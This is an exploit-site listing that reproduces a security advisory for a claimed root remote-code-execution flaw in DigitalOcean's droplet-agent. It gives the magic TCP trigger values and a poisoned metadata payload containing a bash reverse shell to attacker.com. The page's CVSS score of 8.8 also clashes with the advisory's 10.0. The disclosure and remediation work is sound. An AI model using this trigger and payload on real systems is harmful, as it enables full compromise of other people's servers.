Exploit for 📄 DigitalOcean Droplet Agent Remote Command Execution CVE-2026-24516

Name: Exploit for 📄 DigitalOcean Droplet Agent Remote Command Execution CVE-2026-24516
Rating: 5 (169 reviews)
2026-04-03 | CVSS 8.8
## https://sploitus.com/exploit?id=PACKETSTORM:218360
# CVE-2026-24516-DigitalOcean-RCE.
    Technical analysis and PoC for CVE-2026-24516: Unauthenticated Root Remote Code Execution in DigitalOcean Droplet Agent (CVSS 10.0).
    ================================================================================
    TECHNICAL SECURITY ADVISORY: CVE-2026-24516
    ================================================================================
    ID:             CVE-2026-24516
    
    TITLE:          Unauthenticated Root RCE via Metadata Poisoning & Side-Channel
    
    SEVERITY:       Critical (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
    
    RESEARCHER:     Anmol Singh Rajput (@poxsky)
    
    AFFECTED:       DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2
    
    ================================================================================
    
    1. ARCHITECTURAL OVERVIEW
    -------------------------
    The 'droplet-agent' is a privileged system daemon (UID 0) designed for remote 
    telemetry and diagnostics. It maintains a passive monitoring state until a 
    specific signaling sequence is received. The core vulnerability lies in the 
    "Implicit Trust Model" of the link-local metadata service (169.254.169.254), 
    which lacks cryptographic integrity checks.
    
    2. DEEP DIVE: EXPLOIT PRIMITIVES
    
    A. PASSIVE TCP SIDE-CHANNEL (THE SIGNALING LAYER)
    The agent utilizes a raw socket listener (internal/metadata/watcher/ssh_watcher.go) 
    on Port 22. It performs state transition from IDLE to ACTIVE based on hardcoded 
    magic constants in the TCP header:
    - Sequence Number (Seq): 0x419AD37 (68796879 -> "DODO")
    - Acknowledgment Number (Ack): 0xCF259 (848489 -> "TTY")
    
    Analysis: This creates a deterministic trigger. An external attacker can 
    impersonate the infrastructure control plane by spoofing a single TCP SYN 
    packet with these magic values.
    
    
    
    B. TRUST BOUNDARY VIOLATION (THE LINK-LOCAL FLAW)
    Upon signaling, the agent fetches JSON instructions from the cloud metadata 
    endpoint. The vulnerability is a Lack of Authenticity Verification. The agent 
    treats the 169.254.169.254 zone as a "Hardened Trusted Zone," failing to verify 
    payload signatures (HMAC/mTLS).
    
    
    
    C. THE SINK: UNSANITIZED COMMAND INJECTION
    The 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) 
    contains a sink where it parses the 'requesting' array. 
    - Vulnerable Sink: exec.CommandContext(ctx, name, args...)
    - Logic Flaw: The validation logic only performs a prefix check ('command:'). 
      It fails to tokenize inputs or sanitize shell metacharacters (;, |, &, $).
    
    3. WEAPONIZED ATTACK CHAIN (SSRF-TO-ROOT-RCE)
    ---------------------------------------------
    1. IMPERSONATION: Attacker identifies an SSRF in a hosted application to proxy 
       requests to the link-local metadata service.
    2. POISONING: Attacker sets up a malicious metadata server returning:
       {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}
    3. THE KNOCK: Attacker sends the "DODO-TTY" TCP trigger to Port 22.
    4. EXECUTION: The agent fetches the poisoned JSON and executes the reverse 
       shell with EFFECTIVE UID 0 (Root).
    
    
    
    4. IMPACT ASSESSMENT
    --------------------
    - TOTAL SYSTEM COMPROMISE: Full kernel-level access.
    - PERSISTENCE: Ability to inject rootkits or persistent SSH backdoors.
    - TENANT RISK: A single SSRF in any customer app leads to a full droplet 
      takeover, bypassing all OS-level firewalls.
    
    5. REMEDIATION STRATEGY
    -----------------------
    - CRYPTOGRAPHIC INTEGRITY: Implement JWT/HMAC signing for all metadata payloads.
    - NAMESPACE ISOLATION: Run the actioner in a restricted PID/Network namespace.
    - ALLOWLISTING: Hardcode a set of immutable diagnostic binaries; reject all 
      dynamic string inputs.
    
    
    <img width="1353" height="663" alt="1000071250" src="https://github.com/user-attachments/assets/4ae10d28-6e78-432d-981b-0ca206ed0fdc" />
    <img width="1366" height="355" alt="1000071254" src="https://github.com/user-attachments/assets/5ac0eed5-7dcf-473d-8938-dbdbb1e13b7c" />
    <img width="1266" height="221" alt="1000071252" src="https://github.com/user-attachments/assets/a339aa01-2883-438a-af43-ae95c7ec83f9" />
    <img width="913" height="434" alt="1000071246" src="https://github.com/user-attachments/assets/b599ece3-68c8-4d7f-a18a-6bdaf1cc84d1" />
    <img width="960" height="254" alt="1000071243" src="https://github.com/user-attachments/assets/70cedfe1-9d56-4f6c-9a03-96b53d68635c" />
    <img width="820" height="511" alt="1000071244" src="https://github.com/user-attachments/assets/e4a2e52c-2359-4785-a460-581196618abc" />
    <img width="638" height="421" alt="1000071247" src="https://github.com/user-attachments/assets/a7fd2cb3-9c42-4c49-bb40-53681bc4b527" />
    <img width="676" height="370" alt="1000071249" src="https://github.com/user-attachments/assets/42aafcbf-8bff-44c2-a62d-179735e4dda4" />
    <img width="676" height="587" alt="1000071251" src="https://github.com/user-attachments/assets/56224308-19c4-41fc-8f07-e42c6e307ae3" />